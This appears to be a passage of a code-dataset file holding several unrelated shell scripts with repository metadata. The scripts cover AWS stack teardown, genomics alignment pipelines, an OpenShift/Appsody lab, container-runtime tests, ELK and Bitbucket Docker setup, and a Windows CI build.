aws cloudformation delete-stack --stack-name docaas
# Delete docaas-dynamos stack
aws cloudformation delete-stack --stack-name docaas-dynamos
# Confirm cfn deleted with Amplify STACK!!
# (delete-stack is asynchronous; the waits below block until each stack is
# actually gone.)
aws cloudformation wait stack-delete-complete --stack-name docaas-dynamos
aws cloudformation wait stack-delete-complete --stack-name docaas
aws cloudformation wait stack-delete-complete --stack-name $STACKNAME
# delete IAM policies DefaultPolicyForAuthenticatedUsers and DynamoPolicyForAuthenticatedUsers
aws iam delete-policy --policy-arn arn:aws:iam::$AWSACCOUNT:policy/DoCaaSDynamoPolicyForAuthenticated
aws iam delete-policy --policy-arn arn:aws:iam::$AWSACCOUNT:policy/DoCaaSDefaultPolicyForAuthenticated
echo "Everything's been reset"
| true |
a123a8569f28f53ad368d278cb3534d2631dff19 | Shell | sergiogl68/Genomics_Project | /Genomics_Project.sh | UTF-8 | 2,533 | 2.859375 | 3 | [] | no_license |
# ChIP-seq analysis log for E. coli K-12: QC, mapping, ENCODE QC metrics,
# peak calling and motif extraction.  SRR576933 = ChIP sample,
# SRR576938 = input control.
#Check the quality of the data using FASTQC--------------------------------------------------------------
conda activate #All tools were installed under miniconda 3 in the base environment
fastqc SRR576933.fastq #control
fastqc SRR576938.fastq #Experimental condition
#Mapping-------------------------------------------------------------------------------------------------
bowtie-build EC_K12.fna E_coli_K12 #Building the genome index file to perform the mapping later
#Mapping the ChIp readings with the reference genome using the genome index file previously built
# -v 2: up to 2 mismatches; -m 1: discard multi-mapping reads; -3 1: trim
# one base from the 3' end; -S: SAM output (alignment stats go to *.out).
bowtie E_coli_K12 -q SRR576933.fastq -v 2 -m 1 -3 1 -S 2> SRR576933.out > SRR576933.sam
bowtie E_coli_K12 -q SRR576938.fastq -v 2 -m 1 -3 1 -S 2> SRR576938.out > SRR576938.sam
#Verify Two ENCODE quality metrics-----------------------------------------------------------------------
#For the experiment
# -F 0x0204 drops unmapped/QC-failed reads; the awk converts each alignment
# to tagAlign (BED6) with strand taken from flag bit 16.
samtools view -bS SRR576933.sam > SRR576933.bam
samtools view -F 0x0204 -o - SRR576933.bam | awk 'BEGIN{OFS="\t"}{if (and($2,16) > 0) {print $3,($4-1),($4-1+length($10)),"N","1000","-"} else {print $3,($4-1),($4-1+length($10)),"N","1000","+"} }' | gzip -c > SRR576933_experiment.tagAlign.gz
Rscript ./run_spp.R -c=SRR576933_experiment.tagAlign.gz -savp -out=SRR576933_experiment_phantompeaks
#for the control
samtools view -bS SRR576938.sam > SRR576938.bam
samtools view -F 0x0204 -o - SRR576938.bam | awk 'BEGIN{OFS="\t"}{if (and($2,16) > 0) {print $3,($4-1),($4-1+length($10)),"N","1000","-"} else {print $3,($4-1),($4-1+length($10)),"N","1000","+"} }' | gzip -c > SRR576938_experiment.tagAlign.gz
Rscript ./run_spp.R -c=SRR576938_experiment.tagAlign.gz -savp -out=SRR576938_experiment_phantompeaks
#Peak calling using MACS2-------------------------------------------------------------------------------
# --gsize 4641652 is the E. coli K-12 genome size.
macs2 callpeak -t SRR576933.sam -c SRR576938.sam --format SAM --gsize 4641652 --name "macs2" --bw 400 --keep-dup 2 --bdg --nomodel --extsize 200 &> MACS.out
#Motif analysis-----------------------------------------------------------------------------------------
# bedtools getfasta -fi EC_K12.fna -bed macs2_summits.bed -fo macs2_peaks.fa #from the peaks only
bedtools getfasta -fi EC_K12.fna -bed macs2_peaks.narrowPeak -fo macs2_NarrowPeaks.fa #from the bed+4 file
perl -lane '$start=$F[1]-100 ; $end = $F[2]+100 ; print "$F[0]\t$start\t$end"' macs2_summits.bed > macs2_summits+-100.bed #from the summits +-100 bp
bedtools getfasta -fi EC_K12.fna -bed macs2_summits+-100.bed -fo macs2_summits+-100.fa
| true |
cd678ea867ceea00633239daf9811a10a698284a | Shell | LieberInstitute/RNAseq-pipeline | /sh/step3-hisat2.sh | UTF-8 | 7,949 | 3.34375 | 3 | [] | no_license | #!/bin/bash
## Usage information:
# bash step3-hisat2.sh --help
# Define variables
# Parse both short and long options with GNU getopt; the normalized option
# string is re-installed as the positional parameters via `eval set --`.
TEMP=$(getopt -o x:p:i:b:l:s:u:h --long experiment:,prefix:,index:,bed:,large:,stranded:,unaligned:,help -n 'step3-hisat2' -- "$@")
eval set -- "$TEMP"
# Defaults for the three optional flags; -x/-p/-i/-b are effectively required
# and are validated indirectly by the downstream commands that use them.
LARGE="FALSE"
STRANDED="FALSE"
UNALIGNED="FALSE"
while true; do
    case "$1" in
        -x|--experiment)
            case "$2" in
                "") shift 2 ;;
                *) EXPERIMENT=$2 ; shift 2;;
            esac;;
        -p|--prefix)
            case "$2" in
                "") shift 2 ;;
                *) PREFIX=$2 ; shift 2;;
            esac;;
        -i|--index)
            # Path prefix of the HISAT2 genome index.
            case "$2" in
                "") shift 2 ;;
                *) HISATIDX=$2 ; shift 2;;
            esac;;
        -b|--bed)
            # Gene-model BED file consumed by infer_experiment.py.
            case "$2" in
                "") shift 2 ;;
                *) BED=$2 ; shift 2;;
            esac;;
        -l|--large)
            case "$2" in
                "") LARGE="FALSE" ; shift 2;;
                *) LARGE=$2; shift 2;;
            esac ;;
        -s|--stranded)
            case "$2" in
                "") STRANDED="FALSE" ; shift 2;;
                *) STRANDED=$2; shift 2;;
            esac ;;
        -u|--unaligned)
            case "$2" in
                "") UNALIGNED="FALSE" ; shift 2;;
                *) UNALIGNED=$2; shift 2;;
            esac ;;
        -h|--help)
            echo -e "Usage:\nShort options:\n  bash step3-hisat2.sh -x -p -i -b -l (default:FALSE) -s (default:FALSE) -u (default:FALSE)\nLong options:\n  bash step3-hisat2.sh --experiment --prefix --index --bed --large (default:FALSE) --stranded (default:FALSE) --unaligned (default:FALSE)"; exit 0; shift ;;
        --) shift; break ;;
        *) echo "Incorrect options!"; exit 1;;
    esac
done
# Derive all configuration that will be baked into the generated SGE scripts:
# software root, working dir, job name, memory request and the HISAT2
# strandedness / unaligned-read options.
SOFTWARE=/dcl01/lieber/ajaffe/Emily/RNAseq-pipeline/Software
MAINDIR=${PWD}
SHORT="hisat2-${EXPERIMENT}"
sname="step3-${SHORT}.${PREFIX}"
CORES=8
# Larger memory reservation for big experiments (-l/--large TRUE).
if [[ $LARGE == "TRUE" ]]
then
    MEM="mem_free=12G,h_vmem=14G,h_fsize=200G"
else
    MEM="mem_free=5G,h_vmem=6G,h_fsize=200G"
fi
# Marker files created by earlier pipeline steps control e-mail notification
# (-m e vs -m a), the SGE queue, and single- vs paired-end mode.
if [ -f ".send_emails" ]
then
    EMAIL="e"
else
    EMAIL="a"
fi
if [ -f ".queue" ]
then
    SGEQUEUE="$(cat .queue),"
else
    SGEQUEUE=""
fi
# NOTE(review): the tests below use unquoted ${STRANDED}/${UNALIGNED}; they
# would break if either variable were set to an empty string — confirm
# upstream always supplies a non-empty value.
if [ -f ".paired_end" ]
then
    PE="TRUE"
    # Paired-end strandness flags: FR (forward) / RF (reverse).
    if [ ${STRANDED} == "FALSE" ]
    then
        STRANDOPTION=""
    elif [ ${STRANDED} == "forward" ]
    then
        STRANDOPTION="--rna-strandness FR"
    elif [ ${STRANDED} == "reverse" ]
    then
        STRANDOPTION="--rna-strandness RF"
    else
        echo "The option --stranded has to either be 'FALSE', 'forward' or 'reverse'."
        exit 1
    fi
else
    PE="FALSE"
    # Single-end strandness flags: F / R.
    if [ ${STRANDED} == "FALSE" ]
    then
        STRANDOPTION=""
    elif [ ${STRANDED} == "forward" ]
    then
        STRANDOPTION="--rna-strandness F"
    elif [ ${STRANDED} == "reverse" ]
    then
        STRANDOPTION="--rna-strandness R"
    else
        echo "The option --stranded has to either be 'FALSE', 'forward' or 'reverse'."
        exit 1
    fi
fi
# Optionally keep reads that fail to align (written per-sample at job time,
# hence the escaped \${ID} inside the option string).
if [ ${UNALIGNED} == "FALSE" ]
then
    UNALIGNEDOPT=""
elif [ ${UNALIGNED} == "TRUE" ]
then
    mkdir -p ${MAINDIR}/HISAT2_out/unaligned
    UNALIGNEDOPT="--un-conc ${MAINDIR}/HISAT2_out/unaligned/\${ID}.fastq"
else
    echo "The option --unaligned has to either be 'FALSE' or 'TRUE'"
    exit 1
fi
# Construct shell files
# Build the SGE array-job script: one task per unique sample id in
# samples.manifest (the id is the last whitespace-separated column).
FILELIST=${MAINDIR}/samples.manifest
NUM=$(cat $FILELIST | awk '{print $NF}' | uniq | wc -l)
echo "Creating script ${sname}"
# Inside the (unquoted-delimiter) heredoc, ${VAR} is expanded NOW so the
# configuration above is baked into the generated script, while \$ escapes
# survive and are evaluated later, when the job actually runs. Do not add
# lines inside the heredoc: its content is the generated script verbatim.
cat > ${MAINDIR}/.${sname}.sh <<EOF
#!/bin/bash
#$ -cwd
#$ -l ${SGEQUEUE}${MEM}
#$ -N ${sname}
#$ -pe local ${CORES}
#$ -o ./logs/${SHORT}.\$TASK_ID.txt
#$ -e ./logs/${SHORT}.\$TASK_ID.txt
#$ -t 1-${NUM}
#$ -tc 15
#$ -hold_jid pipeline_setup,step2-trim-${EXPERIMENT}.${PREFIX}
#$ -m ${EMAIL}
echo "**** Job starts ****"
date
echo "**** JHPCE info ****"
echo "User: \${USER}"
echo "Job id: \${JOB_ID}"
echo "Job name: \${JOB_NAME}"
echo "Hostname: \${HOSTNAME}"
echo "Task id: \${SGE_TASK_ID}"
echo "****"
echo "Sample id: \$(cat ${MAINDIR}/samples.manifest | awk '{print \$NF}' | awk "NR==\${SGE_TASK_ID}")"
echo "****"
# Directories
mkdir -p ${MAINDIR}/HISAT2_out/align_summaries
mkdir -p ${MAINDIR}/HISAT2_out/infer_strandness
if [ ${UNALIGNED} == "TRUE" ]
then
    mkdir -p ${MAINDIR}/HISAT2_out/unaligned
fi
## Locate file and ids
FILE1=\$(awk 'BEGIN {FS="\t"} {print \$1}' ${FILELIST} | awk "NR==\${SGE_TASK_ID}")
if [ $PE == "TRUE" ]
then
    FILE2=\$(awk 'BEGIN {FS="\t"} {print \$3}' ${FILELIST} | awk "NR==\${SGE_TASK_ID}")
fi
ID=\$(cat ${FILELIST} | awk '{print \$NF}' | awk "NR==\${SGE_TASK_ID}")
if [ -f ${MAINDIR}/trimmed_fq/\${ID}_trimmed_forward_paired.fastq ] ; then
    ## Trimmed, paired-end
    echo "HISAT2 alignment run on trimmed paired-end reads"
    FP=${MAINDIR}/trimmed_fq/\${ID}_trimmed_forward_paired.fastq
    FU=${MAINDIR}/trimmed_fq/\${ID}_trimmed_forward_unpaired.fastq
    RP=${MAINDIR}/trimmed_fq/\${ID}_trimmed_reverse_paired.fastq
    RU=${MAINDIR}/trimmed_fq/\${ID}_trimmed_reverse_unpaired.fastq
    ${SOFTWARE}/hisat2-2.0.4/hisat2 -p ${CORES} \
    -x $HISATIDX -1 \$FP -2 \$RP -U \${FU},\${RU} \
    -S ${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam ${STRANDOPTION} --phred33 \
    ${UNALIGNEDOPT} \
    2>${MAINDIR}/HISAT2_out/align_summaries/\${ID}_summary.txt
elif [ -f ${MAINDIR}/trimmed_fq/\${ID}_trimmed.fastq ] ; then
    ## Trimmed, single-end
    echo "HISAT2 alignment run on trimmed single-end reads"
    ${SOFTWARE}/hisat2-2.0.4/hisat2 -p ${CORES} \
    -x $HISATIDX -U ${MAINDIR}/trimmed_fq/\${ID}_trimmed.fastq \
    -S ${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam ${STRANDOPTION} --phred33 \
    2>${MAINDIR}/HISAT2_out/align_summaries/\${ID}_summary.txt
elif [ $PE == "TRUE" ] ; then
    ## Untrimmed, pair-end
    echo "HISAT2 alignment run on original untrimmed paired-end reads"
    ${SOFTWARE}/hisat2-2.0.4/hisat2 -p ${CORES} \
    -x $HISATIDX -1 \${FILE1} -2 \${FILE2} \
    -S ${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam ${STRANDOPTION} --phred33 \
    ${UNALIGNEDOPT} \
    2>${MAINDIR}/HISAT2_out/align_summaries/\${ID}_summary.txt
else
    ## Untrimmed, single-end
    echo "HISAT2 alignment run on original untrimmed single-end reads"
    ${SOFTWARE}/hisat2-2.0.4/hisat2 -p ${CORES} \
    -x $HISATIDX -U \${FILE1} \
    -S ${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam ${STRANDOPTION} --phred33 \
    2>${MAINDIR}/HISAT2_out/align_summaries/\${ID}_summary.txt
fi
###sam to bam
SAM=${MAINDIR}/HISAT2_out/\${ID}_hisat_out.sam
ORIGINALBAM=${MAINDIR}/HISAT2_out/\${ID}_accepted_hits.bam
SORTEDBAM=${MAINDIR}/HISAT2_out/\${ID}_accepted_hits.sorted
#filter unmapped segments
echo "**** Filtering unmapped segments ****"
date
${SOFTWARE}/samtools-1.2/samtools view -bh -F 4 \${SAM} > \${ORIGINALBAM}
${SOFTWARE}/samtools-1.2/samtools sort -@ ${CORES} \${ORIGINALBAM} \${SORTEDBAM}
${SOFTWARE}/samtools-1.2/samtools index \${SORTEDBAM}.bam
## Clean up
rm \${SAM}
rm \${ORIGINALBAM}
## Run infer experiment
echo "**** Inferring strandedness with infer_experiment.py ****"
date
module load python/2.7.9
~/.local/bin/infer_experiment.py -i \${SORTEDBAM}.bam -r ${BED} 1> ${MAINDIR}/HISAT2_out/infer_strandness/\${ID}.txt 2>&1
echo "**** Job ends ****"
date
EOF
# Submit the generated array job.
call="qsub .${sname}.sh"
echo $call
$call
## Process the output from infer_experiment.py for all samples
# Second, non-array job: waits (-hold_jid) for every HISAT2 task above,
# then summarizes the per-sample strandness reports with an R script.
SHORT="infer-strandness-${EXPERIMENT}"
sname="step3b-${SHORT}.${PREFIX}"
echo "Creating script ${sname}"
# As above: ${VAR} expands now, \$VAR at job run time. Heredoc content is the
# generated script verbatim — do not insert lines inside it.
cat > ${MAINDIR}/.${sname}.sh <<EOF
#!/bin/bash
#$ -cwd
#$ -N ${sname}
#$ -o ./logs/${SHORT}.txt
#$ -e ./logs/${SHORT}.txt
#$ -hold_jid pipeline_setup,step3-hisat2-${EXPERIMENT}.${PREFIX}
#$ -m ${EMAIL}
echo "**** Job starts ****"
date
echo "**** JHPCE info ****"
echo "User: \${USER}"
echo "Job id: \${JOB_ID}"
echo "Job name: \${JOB_NAME}"
echo "Hostname: \${HOSTNAME}"
echo "****"
## Process the infer experiment info
Rscript /dcl01/lieber/ajaffe/Emily/RNAseq-pipeline/sh/step3b_infer_strandness.R -o "HISAT2_out/infer_strandness" -p "inferred_strandness_pattern.txt"
echo "**** Job ends ****"
date
EOF
# Submit the summary job.
call="qsub .${sname}.sh"
echo $call
$call
| true |
ff7300f430f351f5ddae335dbcc3a6fa9b4774d2 | Shell | shimijun/think2020-cp4a-master-class | /scripts/part1.sh | UTF-8 | 7,099 | 2.515625 | 3 | [
"Apache-2.0"
] | permissive |
# CP4A master-class lab, part 1 (section A): cluster preparation, Appsody
# repo setup, a hello-world Appsody app, cloning the three demo services,
# and creating the cloudlab project with its Jaeger tracing ConfigMap.
# The "New/End code block, line: N" markers index into the lab guide.
# New code block, line: 155
oc get csr -o name | xargs oc adm certificate approve
# End code block, line: 157
# New code block, line: 161
oc delete ClusterServiceVersion elasticsearch-operator.4.3.5-202003020549 \
  --ignore-not-found=true \
  -n openshift-operators
# End code block, line: 165
oc create namespace istio-system
# New code block, line: 196
appsody repo list
# End code block, line: 198
# New code block, line: 211
appsody repo add kabanero https://github.com/kabanero-io/kabanero-stack-hub/releases/download/0.7.0/kabanero-stack-hub-index.yaml
appsody list kabanero
# End code block, line: 215
# New code block, line: 230
rm -rf /tmp/nodejs-app
mkdir -p /tmp/nodejs-app
cd /tmp/nodejs-app
appsody init kabanero/nodejs-express
appsody run &
# End code block, line: 237
# New code block, line: 241
sleep 30
curl localhost:3000
# End code block, line: 243
# New code block, line: 253
cd /tmp/nodejs-app
appsody stop
# End code block, line: 256
rm -rf /home/ibmdemo/cp4a-labs/think20
# New code block, line: 279
# Clone the three demo services at their v1 tags.
mkdir -p /home/ibmdemo/cp4a-labs/think20
cd /home/ibmdemo/cp4a-labs/think20
git clone https://github.com/think-2020-cp4a/service-a.git
cd service-a
git checkout v1
cd /home/ibmdemo/cp4a-labs/think20
git clone https://github.com/think-2020-cp4a/service-b.git
cd service-b
git checkout v1
cd /home/ibmdemo/cp4a-labs/think20
git clone https://github.com/think-2020-cp4a/service-c.git
cd service-c
git checkout v1
# End code block, line: 296
# New code block, line: 303
oc new-project cloudlab
# End code block, line: 305
# New code block, line: 318
# ConfigMap consumed by the services to send traces to the in-cluster Jaeger
# collector. Heredoc body is literal YAML — keep verbatim.
cat<<EOF | oc apply -n cloudlab -f -
apiVersion: v1
kind: ConfigMap
metadata:
  name: jaeger-config
data:
  JAEGER_ENDPOINT: http://jaeger-collector.istio-system.svc.cluster.local:14268/api/traces
  JAEGER_PROPAGATION: b3
  JAEGER_REPORTER_LOG_SPANS: "true"
  JAEGER_SAMPLER_PARAM: "1"
  JAEGER_SAMPLER_TYPE: const
EOF
# End code block, line: 331
# CP4A master-class lab, part 1 (section B): expose the internal image
# registry, build each service image with Appsody (pushing to the registry),
# deploy all three via the Appsody operator, smoke-test, and undeploy.
# New code block, line: 348
oc patch configs.imageregistry.operator.openshift.io/cluster \
  --patch '{"spec":{"defaultRoute":true}}' \
  --type=merge
HOST=$(oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}')
docker login -u $(oc whoami) -p $(oc whoami -t) $HOST
# End code block, line: 356
# New code block, line: 363
HOST=$(oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}')
cd /home/ibmdemo/cp4a-labs/think20/service-a
# this may take a few minutes
# --pull-url is the in-cluster registry name baked into the deployment;
# --push-url is the external route used by the local docker daemon.
appsody build \
  --pull-url image-registry.openshift-image-registry.svc:5000 \
  --push-url $HOST/cloudlab \
  --tag service-a:1.0.0
# End code block, line: 373
# New code block, line: 385
HOST=$(oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}')
cd /home/ibmdemo/cp4a-labs/think20/service-b
# this may take a few minutes
appsody build \
  --pull-url image-registry.openshift-image-registry.svc:5000 \
  --push-url $HOST/cloudlab \
  --tag service-b:1.0.0
# End code block, line: 395
# New code block, line: 399
HOST=$(oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}')
cd /home/ibmdemo/cp4a-labs/think20/service-c
# this may take a few minutes
appsody build \
  --pull-url image-registry.openshift-image-registry.svc:5000 \
  --push-url $HOST/cloudlab \
  --tag service-c:1.0.0
# End code block, line: 409
# New code block, line: 413
docker images default-route-openshift-image-registry.apps.demo.ibmdte.net/cloudlab/*
# End code block, line: 415
# New code block, line: 455
# Deploy the already-built images (--no-build) with the Appsody operator.
cd /home/ibmdemo/cp4a-labs/think20/service-a
appsody deploy \
  --no-build \
  --namespace cloudlab
# End code block, line: 461
# New code block, line: 472
cd /home/ibmdemo/cp4a-labs/think20/service-b
appsody deploy \
  --no-build \
  --namespace cloudlab
# End code block, line: 478
# New code block, line: 482
cd /home/ibmdemo/cp4a-labs/think20/service-c
appsody deploy \
  --no-build \
  --namespace cloudlab
# End code block, line: 488
# New code block, line: 501
oc get AppsodyApplication -n cloudlab -w
# End code block, line: 503
# New code block, line: 530
oc get route -n cloudlab
# End code block, line: 532
# New code block, line: 545
curl service-a-cloudlab.apps.demo.ibmdte.net/node-jee
curl service-a-cloudlab.apps.demo.ibmdte.net/node-springboot
# End code block, line: 548
# New code block, line: 559
cd /home/ibmdemo/cp4a-labs/think20/service-a
appsody deploy delete --namespace cloudlab
cd /home/ibmdemo/cp4a-labs/think20/service-b
appsody deploy delete --namespace cloudlab
cd /home/ibmdemo/cp4a-labs/think20/service-c
appsody deploy delete --namespace cloudlab
# End code block, line: 568
# CP4A master-class lab, part 1 (section C): redeploy the three services with
# plain `oc new-app`, expose/smoke-test service-a, then clean up and run the
# Tekton/Kabanero pipelines for each service.
# New code block, line: 590
oc new-app \
  --docker-image=image-registry.openshift-image-registry.svc:5000/cloudlab/service-a:1.0.0 \
  --name=service-a \
  --namespace cloudlab \
  --insecure-registry=true
oc new-app \
  --docker-image=image-registry.openshift-image-registry.svc:5000/cloudlab/service-b:1.0.0 \
  --name=service-b \
  --namespace cloudlab \
  --insecure-registry=true
oc new-app \
  --docker-image=image-registry.openshift-image-registry.svc:5000/cloudlab/service-c:1.0.0 \
  --name=service-c \
  --namespace cloudlab \
  --insecure-registry=true
# End code block, line: 608
# New code block, line: 612
oc expose svc/service-a -n cloudlab
# End code block, line: 614
# New code block, line: 618
curl service-a-cloudlab.apps.demo.ibmdte.net/node-jee
curl service-a-cloudlab.apps.demo.ibmdte.net/node-springboot
# End code block, line: 621
# New code block, line: 679
oc get route -n tekton-pipelines tekton-dashboard
# End code block, line: 681
# New code block, line: 766
# Tear down everything oc new-app created in cloudlab.
oc get dc -n cloudlab -o name | xargs oc delete -n cloudlab
oc get svc -n cloudlab -o name | xargs oc delete -n cloudlab
oc get route -n cloudlab -o name | xargs oc delete -n cloudlab
oc get imagestream -n cloudlab -o name | xargs oc delete -n cloudlab
# End code block, line: 771
# New code block, line: 777
# Re-trigger each manual Tekton PipelineRun (delete first so apply re-creates).
cd /home/ibmdemo/cp4a-labs/think20/service-a/tekton
oc delete -n kabanero --ignore-not-found=true -f service-a-manual-pipeline-run-v1.yaml
oc apply -n kabanero -f service-a-manual-pipeline-run-v1.yaml
# End code block, line: 783
# New code block, line: 787
cd /home/ibmdemo/cp4a-labs/think20/service-b/tekton
oc delete -n kabanero --ignore-not-found=true -f service-b-manual-pipeline-run-v1.yaml
oc apply -n kabanero -f service-b-manual-pipeline-run-v1.yaml
# End code block, line: 793
# New code block, line: 797
cd /home/ibmdemo/cp4a-labs/think20/service-c/tekton
oc delete -n kabanero --ignore-not-found=true -f service-c-manual-pipeline-run-v1.yaml
oc apply -n kabanero -f service-c-manual-pipeline-run-v1.yaml
# End code block, line: 803
# New code block, line: 812
tkn pipelinerun list -n kabanero
# End code block, line: 814
# New code block, line: 827
tkn taskrun list -n kabanero
# End code block, line: 829
# New code block, line: 845
#tkn taskrun logs service-a-pipeline-run-v1-build-push-task-2tw5f -n kabanero
# End code block, line: 847
| true |
5e4d1ae730b1152eda5062ad596a5d757aaee9d5 | Shell | igamemedia/nvidia-container-runtime | /runtimeconfig/test/docker_test.sh | UTF-8 | 2,617 | 3.578125 | 4 | [
"BSD-3-Clause"
] | permissive | #! /bin/bash
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -euxo pipefail
# lastpipe: run the final stage of a pipeline in the current (non-interactive)
# shell so variables it sets are visible afterwards.
shopt -s lastpipe
readonly basedir="$(dirname "$(realpath "$0")")"
# Name of the docker-in-docker container used by all testing::* helpers below.
readonly dind_name="nvidia-container-runtime-dind"
# Load shared helpers from the sibling src directory.
source "${basedir}/../src/common.sh"
testing::cleanup() {
  # Give the current user write access to everything the DinD daemon created
  # as root inside the shared volume, so the host-side rm -rf below succeeds.
  docker run -it --privileged -v "${shared_dir}:/shared" alpine:latest chmod -R 777 /shared
  rm -rf "${shared_dir}" || true
  # Bug fix: `docker kill ... || true &> /dev/null` redirected the output of
  # `true`, not of docker, so "no such container" noise still reached the
  # terminal. Silence docker itself, then swallow its exit status.
  docker kill "${dind_name}" &> /dev/null || true
  docker rm "${dind_name}" &> /dev/null || true
  return
}
testing::setup() {
  # Create the shared-volume skeleton expected by the DinD container and the
  # toolkit installer (docker config, nvidia runtime dir, runtime config dir).
  local subdir
  for subdir in "" "/etc/docker" "/run/nvidia" "/etc/nvidia-container-runtime"; do
    mkdir -p "${shared_dir}${subdir}"
  done
}
testing::dind() {
  # Docker creates /etc/docker when starting
  # by default there isn't any config in this directory (even after the daemon starts)
  local -a docker_args=(
    --privileged
    -v "${shared_dir}/etc/docker:/etc/docker"
    -v "${shared_dir}/run/nvidia:/run/nvidia:shared"
    --name "${dind_name}"
    -d
  )
  docker run "${docker_args[@]}" docker:stable-dind -H unix://run/nvidia/docker.sock
}
testing::dind::alpine() {
  # Run an arbitrary command line inside the DinD container via `sh -c`.
  local joined_cmd="$*"
  docker exec -it "${dind_name}" sh -c "${joined_cmd}"
}
testing::toolkit() {
  # Run the toolkit installer image against the DinD daemon, forwarding any
  # extra flags (e.g. --no-uninstall, --no-daemon) to /work/run.sh.
  # Share the volumes so that we can edit the config file and point to the new runtime
  # Share the pid so that we can ask docker to reload its config
  # NOTE(review): relies on ${tool_image} being set by the caller
  # (testing::main) through bash dynamic scoping — confirm before reusing
  # this helper elsewhere.
  docker run -it --privileged \
    --volumes-from "${dind_name}" \
    --pid "container:${dind_name}" \
    "${tool_image}" \
    bash -x -c "/work/run.sh /run/nvidia /run/nvidia/docker.sock $*"
}
testing::main() {
  # End-to-end flow: install the toolkit into DinD, check that plain (non-GPU)
  # containers still run, uninstall, and verify the uninstall left the state
  # expected (no daemon.json, toolkit files still present on the volume).
  local -r tool_image="${1:-"nvidia/container-toolkit:docker19.03"}"
  testing::setup
  testing::dind
  testing::toolkit --no-uninstall --no-daemon
  # Ensure that we haven't broken non GPU containers
  testing::dind::alpine docker run -it alpine echo foo
  # Uninstall
  testing::toolkit --no-daemon
  testing::dind::alpine test ! -f /etc/docker/daemon.json
  # Non-empty toolkit dir after uninstall is the expected (intentional) state.
  toolkit_files="$(ls -A "${shared_dir}"/run/nvidia/toolkit)"
  test ! -z "${toolkit_files}"
  testing::cleanup
}
# Entry point: $1 is the shared-volume directory (default ./shared); any
# remaining arguments are passed to testing::main (i.e. $2 is the tool image).
readonly shared_dir="${1:-"./shared"}"
# NOTE(review): `shift 1` fails when no arguments are given, which aborts the
# script under `set -e` despite shared_dir having a default — confirm callers
# always pass at least one argument.
shift 1
# Always clean up on error, and start from a clean slate.
trap testing::cleanup ERR
testing::cleanup
testing::main "$@"
| true |
a848fc762bc3aceccb9a2d182631ac7ffcd17286 | Shell | gimalon/docker-compose-elk | /logstash/run.sh | UTF-8 | 429 | 3.203125 | 3 | [] | no_license | #!/bin/bash
SERVER="elasticsearch:9200"
# wait for elastic search to boot up
# Poll the Elasticsearch endpoint until curl succeeds, then replace this
# process with Logstash. The curl response body intentionally stays on
# stdout, as before.
while :; do
    echo "-- Curling $SERVER to see if it is up already"
    if curl -s "$SERVER"; then
        echo "-- Got curl connection! Done"
        break
    fi
    # wait 5 more seconds
    echo "-- not yet, waiting 5s"
    sleep 5
done
# set -e
exec /opt/logstash-${LOGSTASH_VERSION}/bin/logstash -f /opt/logstash-${LOGSTASH_VERSION}/logstash.conf
| true |
bfe1ff84fb5ba7d86d74fc3b4dd4ad82b6a6b406 | Shell | blofse/atlassian-bitbucket | /initial_start_with_mysql.sh | UTF-8 | 892 | 3.40625 | 3 | [] | no_license | #!/bin/bash
# Launch a MySQL 5.7 container and the Atlassian Bitbucket container on a
# shared bridge network. $1 is used as both the MySQL root password and the
# "bitbucket" database user's password.
if [[ $# -eq 0 ]] ; then
    # Bug fix: a missing argument is an error — report on stderr and exit
    # non-zero instead of the previous silent-success `exit 0`.
    echo 'Expecting one argument' >&2
    exit 1
fi

docker network create \
    --driver bridge \
    atlassian-bitbucket-network

echo About to start bitbucket mysql container
docker run \
    --name atlassian-bitbucket-database \
    -e MYSQL_ROOT_PASSWORD="$1" \
    -e MYSQL_DATABASE="bitbucket" \
    -e MYSQL_USER="bitbucket" \
    -e MYSQL_PASSWORD="$1" \
    -v atlassian-bitbucket-database-data:/var/lib/mysql \
    --net atlassian-bitbucket-network \
    -d \
    mysql:5.7 --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci

# Crude readiness wait; MySQL needs a moment before Bitbucket connects.
echo About to sleep to give the server time to start up
sleep 15

echo About to start bitbucket container
docker run \
    --name atlassian-bitbucket \
    -p 7990:7990 \
    -p 7999:7999 \
    -v atlassian-bitbucket-home:/var/atlassian/application-data/bitbucket \
    --net atlassian-bitbucket-network \
    -d \
    atlassian-bitbucket
| true |
341fcce9c319481246460bafd339db18a8160929 | Shell | pcca-matrix/intensecoin | /ci/windows.10.x86.sh | UTF-8 | 1,150 | 3.484375 | 3 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | set -x
echo "CI: Windows 10 x86"
# FIXME: workaround for calling 32bit builds directly instead of environment detection
# determine build version
git describe --tags --exact-match 2> /dev/null
if [ $? -eq 0 ]; then
BUILD_VERSION=`git describe --tags --exact-match`
else
BUILD_BRANCH=`git rev-parse --abbrev-ref HEAD`
BUILD_COMMIT=`git rev-parse --short HEAD`
BUILD_VERSION="$BUILD_BRANCH-$BUILD_COMMIT"
fi
export BUILD_VERSION
echo "CI: Building static release..."
make -j2 release-static-win32
if [ $? -ne 0 ]; then
echo "CI: Build failed with error code: $?"
exit 1
fi
echo "CI: Creating release archive..."
RELEASE_NAME="intensecoin-cli-win-32bit-$BUILD_VERSION"
cd build/release/bin/
mkdir $RELEASE_NAME
cp intense-blockchain-export.exe $RELEASE_NAME/
cp intense-blockchain-import.exe $RELEASE_NAME/
cp intense-wallet-cli.exe $RELEASE_NAME/
cp intense-wallet-rpc.exe $RELEASE_NAME/
cp intensecoind.exe $RELEASE_NAME/
cp ../../../ci/package-artifacts/CHANGELOG.txt $RELEASE_NAME/
cp ../../../ci/package-artifacts/README.txt $RELEASE_NAME/
zip -rv $RELEASE_NAME.zip $RELEASE_NAME
